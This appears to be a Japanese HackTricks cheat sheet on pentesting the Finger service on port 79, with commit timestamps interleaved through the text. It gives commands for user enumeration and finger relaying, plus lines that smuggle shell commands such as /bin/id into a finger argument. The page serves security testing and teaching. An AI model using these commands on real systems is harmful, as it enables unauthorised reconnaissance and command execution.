2024-01-05 23:40:55 +00:00
# 79 - Pentesting Finger
2022-04-28 16:01:33 +00:00
< details >
2024-02-08 04:49:53 +00:00
< summary > < strong > ゼロからヒーローまでAWSハッキングを学ぶ< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-08 04:49:53 +00:00
HackTricks をサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-02-09 12:54:39 +00:00
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop ) をチェックしてください!
2024-02-08 04:49:53 +00:00
* [**公式PEASS& HackTricksのグッズ** ](https://peass.creator-spring.com )を入手する
2024-02-09 12:54:39 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な [**NFTs** ](https://opensea.io/collection/the-peass-family ) のコレクションを見つける
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f ) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live ) をフォローする**
* **ハッキングトリックを共有するために、PRを** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) **と** [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) **のGitHubリポジトリに提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2023-07-07 23:42:27 +00:00
## **基本情報**
2020-07-15 15:43:14 +00:00
2024-02-08 04:49:53 +00:00
**Finger** プログラム/サービスは、コンピュータユーザーに関する詳細を取得するために使用されます。通常、提供される情報には **ユーザーのログイン名、フルネーム** が含まれ、場合によっては追加の詳細もあります。これらの追加の詳細には、オフィスの場所や電話番号(利用可能な場合)、ユーザーがログインした時間、非アクティブな期間(アイドル時間)、ユーザーが最後にメールを読んだ時刻、ユーザーのプランとプロジェクトファイルの内容が含まれることがあります。
2020-07-15 15:43:14 +00:00
2024-01-05 23:40:55 +00:00
**デフォルトポート:** 79
2022-05-08 23:13:03 +00:00
```
2020-07-15 15:43:14 +00:00
PORT STATE SERVICE
79/tcp open finger
```
2023-07-07 23:42:27 +00:00
## **列挙**
2024-02-08 04:49:53 +00:00
### **バナー取得/基本的な接続**
2020-07-15 15:43:14 +00:00
```bash
nc -vn < IP > 79
echo "root" | nc -vn < IP > 79
```
2024-01-05 23:40:55 +00:00
### **ユーザー列挙**
2020-07-15 15:43:14 +00:00
```bash
finger @< Victim > #List users
finger admin@< Victim > #Get info of user
finger user@< Victim > #Get info of user
```
2024-02-09 12:54:39 +00:00
代わりに、[**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum)から**finger-user-enum**を使用することもできます。いくつかの例:
2020-11-17 13:01:39 +00:00
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
2024-02-08 04:49:53 +00:00
#### **Nmapはデフォルトのスクリプトを使用するためにスクリプトを実行します**
2020-11-17 13:01:39 +00:00
2023-07-07 23:42:27 +00:00
### MetasploitはNmapよりも多くのトリックを使用します
2022-05-08 23:13:03 +00:00
```
2020-07-15 15:43:14 +00:00
use auxiliary/scanner/finger/finger_users
```
2022-05-08 23:13:03 +00:00
### Shodan
2020-07-15 15:43:14 +00:00
* `port:79 USER`
2024-01-05 23:40:55 +00:00
## コマンド実行
2020-07-15 15:43:14 +00:00
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
2024-02-08 04:49:53 +00:00
## フィンガーバウンス
2020-07-15 15:43:14 +00:00
2024-02-08 04:49:53 +00:00
[システムをフィンガーリレーとして使用する ](https://securiteam.com/exploits/2BUQ2RFQ0I/ )
2022-05-08 23:13:03 +00:00
```
2020-07-15 15:43:14 +00:00
finger user@host@victim
finger @internal@external
```
2022-04-28 16:01:33 +00:00
< details >
2024-02-09 12:54:39 +00:00
< summary > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > を使って、ゼロからヒーローまでAWSハッキングを学ぶ< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-08 04:49:53 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-02-09 12:54:39 +00:00
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS& HackTricksスウォッグ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見る
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )で**フォロー**する。
* **ハッキングトリックを共有するために、PRを** [**HackTricks** ](https://github.com/carlospolop/hacktricks )および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
2022-04-28 16:01:33 +00:00
< / details >